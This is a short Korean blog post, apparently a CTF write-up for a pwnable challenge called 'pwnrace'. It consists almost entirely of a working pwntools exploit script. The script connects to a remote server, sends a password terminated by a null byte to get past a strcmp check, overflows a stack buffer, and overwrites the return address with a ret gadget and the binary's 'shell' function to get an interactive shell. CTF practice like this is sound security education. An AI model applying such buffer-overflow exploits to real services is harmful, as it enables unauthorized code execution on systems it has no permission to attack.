from pwn import *
context.log_level = 'debug'
context.terminal = ['urxvtc', '-e', 'sh', '-c']
context.arch = 'amd64'
#context.arch = 'i386'
ip = "159.223.101.241"
port = 31337
p = remote(ip, port)
file_name = "./pwnrace"
libc_name = "pwnrace"
#p = process(file_name)
e = ELF(file_name)
#libc = ELF(libc_name)
def slog(name, addr): return success(": ".join([name, hex(addr)]))
payload = b"hAcK_Th3_Pl@n3t"
payload += b'\x00'
payload += b"A"*(0x100 - len(payload) + 0x8 )
payload += p64(0x000000000040101a)+p64(e.sym['shell'])
pause()
p.sendlineafter("\x1B[0;32mEnter Password:\n\x1B[0m", payload)
p.interactive()
strcmp 의 특성을 이용해 풀이하면 된다.
'Pwnable > writeup' 카테고리의 다른 글
pwnable.xyz message (0) | 2023.01.16 |
---|---|
Pwnable.tw - 3x17 (0) | 2022.07.29 |
CBHC - Mind Control2 (0) | 2022.07.23 |
CBHC - Mind Control (0) | 2022.07.23 |
Hayyim CTF 2022 Write-up (0) | 2022.02.13 |